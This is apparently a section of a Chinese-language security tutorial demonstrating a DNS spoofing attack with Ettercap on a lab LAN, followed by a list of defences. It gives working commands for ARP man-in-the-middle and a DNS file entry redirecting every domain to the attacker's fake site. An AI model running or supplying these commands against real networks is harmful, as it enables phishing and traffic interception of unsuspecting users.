4.3 DNS欺骗

演示DNS欺骗攻击

DNS欺骗攻击基于中间人攻击。攻击者更改受害者从DNS服务器查询的域名解析结果，给受害者发送恶意网页或钓鱼网页－浏览器依然显示正常的url。

本帖介绍怎么使用Ettercap施行DNS欺骗攻击，实现受害者访问任何网站都转向到攻击者指定的网站。

情形描述

• 同一局域网内

• 受害者ip：192.168.1.185

• kali ip：192.168.1.184

创建恶意网站

开启apache

service apache2 start

创建一个首页文件并写入内容

编辑文件

vim /etc/ettercap/eteer.dns

添加

*A 192.168.1.184

开启欺骗

ettercap -i eth0 -T -P dns_spoof -M arp /192.168.1.185///

受害机测试

防御

进行IP地址和MAC地址的绑定

使用Digital Password进行辨别

优化DNS SERVER的相关项目设置

直接使用IP地址访问

对DNS数据包进行监测